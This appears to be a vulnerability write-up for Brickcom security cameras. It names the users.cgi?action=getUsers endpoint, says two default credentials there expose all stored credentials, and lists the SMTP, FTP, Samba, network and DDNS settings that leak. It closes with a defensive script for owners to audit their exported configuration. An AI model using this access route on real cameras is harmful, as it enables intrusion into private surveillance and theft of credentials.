
Brickcom - Security Cameras Surveillance Exploit


Description: Get credentials through improper authentication and access all configuration settings of the devices.

Several models have a security flaw in the endpoint users.cgi?action=getUsers.
The parameter is affected by improper authentication:
it is possible to use 2 default credentials to directly access all the credentials
in the database through the vulnerable endpoint.
The access can be verified by exporting the configuration file of the device.

Config File Export

IPFilterSetting.permissionType (permission type)
IPFilterSetting.allowList.filterEntry0.enabled (enables the IP filtering whitelist)

Impact:

  • Get improper access to private cameras
  • Steal SMTP credentials
EmailSetting.attachedSnapShotEnabled=0
EmailSetting.attachedVideoClipEnabled=0
EmailSetting.attachedVideoURLEnabled=1
EmailSetting.receiverAddress1=
EmailSetting.receiverAddress2=
EmailSetting.senderAddress=
EmailSetting.senderName=
EmailSetting.subject=
EmailSetting.primary.accountName=
EmailSetting.primary.authenticationMode=1
EmailSetting.primary.password=
EmailSetting.primary.portNo=25
EmailSetting.primary.smtpServerHostName=
  • Steal FTP credentials (remote server -> save records)
FTPSetting.uploadSnapShotEnabled=0
FTPSetting.uploadVideoClipEnabled=0
FTPSetting.primary.accountName=
FTPSetting.primary.addressType=0
FTPSetting.primary.hostname=
FTPSetting.primary.ipAddress=
FTPSetting.primary.ipv6Address=
FTPSetting.primary.passiveModeEnabled=0
FTPSetting.primary.password=
FTPSetting.primary.portNo=21
FTPSetting.primary.ShareDIR=
  • Get Samba Credentials
Samba.addressType=0
Samba.hostDns=
Samba.ipAddress=
Samba.ipv6Address=
Samba.password=guest
Samba.preserve=
Samba.userName=guest
Samba.shareDIR=
Samba.workGroup=
Samba.SambaSnapShotEnabled=0
Samba.SambaVideoClipEnabled=1
  • Basic network settings (discover IP ranges and subnet masks)
BasicNetworkSetting.addressType=0
BasicNetworkSetting.dnsAddress1=80.58.61.250
BasicNetworkSetting.dnsAddress2=80.58.61.254
BasicNetworkSetting.gatewayAddress=192.168.1.1
BasicNetworkSetting.ipv4Address=192.168.1.53
BasicNetworkSetting.ipv4Address2nd=192.168.1.245
BasicNetworkSetting.subnetMask=255.255.255.0
BasicNetworkSetting.subnetMask2nd=255.255.255.0
BasicNetworkSetting.enabledIP2nd=0
BasicNetworkSetting.pppoe.password=
BasicNetworkSetting.pppoe.username=
BasicNetworkSetting.defaultgatewayType=0
BasicNetworkSetting.manualDns=0
BasicNetworkSetting.tcp_mss_option=0
BasicNetworkSetting.tcp_mss_value=1500
  • Wi-Fi settings
WIFISetting.wifibridge=1
WIFISetting.wlNetworkSetting.wifiaddressType=1
WIFISetting.wlNetworkSetting.wifiipv4Address=
WIFISetting.wlNetworkSetting.wifisubnetMask=
WIFISetting.wlNetworkSetting.wifigatewayAddress=
WIFISetting.wlNetworkSetting.wifidnsAddress1=
WIFISetting.wlNetworkSetting.wifidnsAddress2=
WIFISetting.wlNetworkSetting.wifipppoe.username=
WIFISetting.wlNetworkSetting.wifipppoe.password=
  • Discovery on Internet Settings
DiscoveryonInternetSetting.enabled=1
DiscoveryonInternetSetting.upnp_status=0
DiscoveryonInternetSetting.register_status=0
DiscoveryonInternetSetting.online=0
DiscoveryonInternetSetting.check=0
DiscoveryonInternetSetting.checkname=0
DiscoveryonInternetSetting.update=0
DiscoveryonInternetSetting.RefreshTime=60
DiscoveryonInternetSetting.RefreshTimeList=1 5 30 60 180 360 1440
DiscoveryonInternetSetting.weburl=
DiscoveryonInternetSetting.username=
DiscoveryonInternetSetting.discovery_check_status=0
DiscoveryonInternetSetting.type=0
DiscoveryonInternetSetting.http_port=80
DiscoveryonInternetSetting.rtsp_port=554
DiscoveryonInternetSetting.publicip=
DiscoveryonInternetSetting.username_backup=
DiscoveryonInternetSetting.wanip_backup=
DiscoveryonInternetSetting.macaddr_backup=
DiscoveryonInternetSetting.port_backup=
DiscoveryonInternetSetting.localip_backup=
DiscoveryonInternetSetting.https_backup=
DiscoveryonInternetSetting.httpport_backup=
  • DDNS Settings
DDNSSetting.dyndnsEnabled=0
DDNSSetting.dyndns.wildcardEnabled=0
DDNSSetting.dyndns.username=
DDNSSetting.dyndns.password=
DDNSSetting.dyndns.hostname=
DDNSSetting.tzodnsEnabled=0
DDNSSetting.tzodns.wildcardEnabled=0
DDNSSetting.tzodns.username=
DDNSSetting.tzodns.password=
DDNSSetting.tzodns.hostname=
DDNSSetting.noipdnsEnabled=0
DDNSSetting.noipdns.wildcardEnabled=0
DDNSSetting.noipdns.username=
DDNSSetting.noipdns.password=
DDNSSetting.noipdns.hostname=
DDNSSetting.noipdns=1
DDNSSetting.tzolastip=
DDNSSetting.ddns_last_ipaddr=192.168.1.1
DDNSSetting.nameserver=168.95.1.1
  • Get all cameras in CCTV Center with MultiCameraSetSetting.cameraList (view in export config file)
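
For device owners, the impact list above translates into an audit of your own exported configuration file. The following is an added example, not code from this repository: it parses the flat key=value export layout shown on this page and reports stored secrets and weak settings without echoing secret values. The sample export is constructed, and the reading of `1` as enabled and `0` as disabled is an assumption.

```python
import re

# Constructed sample in the flat key=value layout shown on this page.
# All values here are made up for the example.
SAMPLE_EXPORT = """\
EmailSetting.primary.accountName=alerts@example.test
EmailSetting.primary.password=constructed-secret
FTPSetting.primary.accountName=
FTPSetting.primary.password=
Samba.userName=guest
Samba.password=guest
DDNSSetting.dyndns.password=
DiscoveryonInternetSetting.enabled=1
IPFilterSetting.allowList.filterEntry0.enabled=0
"""

SECRET_KEY = re.compile(r"\.password$", re.IGNORECASE)


def parse_export(text):
    """Parse key=value lines; split on the first '=' so values may contain '='."""
    settings = {}
    for line in text.splitlines():
        key, sep, value = line.strip().partition("=")
        if sep and key:
            settings[key] = value
    return settings


def audit(settings):
    """Return (key, finding) pairs; secret values are never echoed back."""
    findings = []
    for key, value in sorted(settings.items()):
        if SECRET_KEY.search(key) and value:
            findings.append((key, "secret stored in export; rotate it"))
    if (settings.get("Samba.userName"), settings.get("Samba.password")) == ("guest", "guest"):
        findings.append(("Samba.userName", "guest/guest share account"))
    # Assumption: "1" means enabled and "0" disabled for these flags.
    if settings.get("DiscoveryonInternetSetting.enabled") == "1":
        findings.append(("DiscoveryonInternetSetting.enabled", "Internet discovery is on"))
    if settings.get("IPFilterSetting.allowList.filterEntry0.enabled", "0") != "1":
        findings.append(("IPFilterSetting.allowList.filterEntry0.enabled", "no IP allow-list entry enabled"))
    return findings


if __name__ == "__main__":
    for key, finding in audit(parse_export(SAMPLE_EXPORT)):
        print(f"{key}: {finding}")
```

Any password key reported here should be treated as exposed on a device that was reachable with default credentials, and rotated on the SMTP, FTP, Samba or DDNS service it belongs to.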
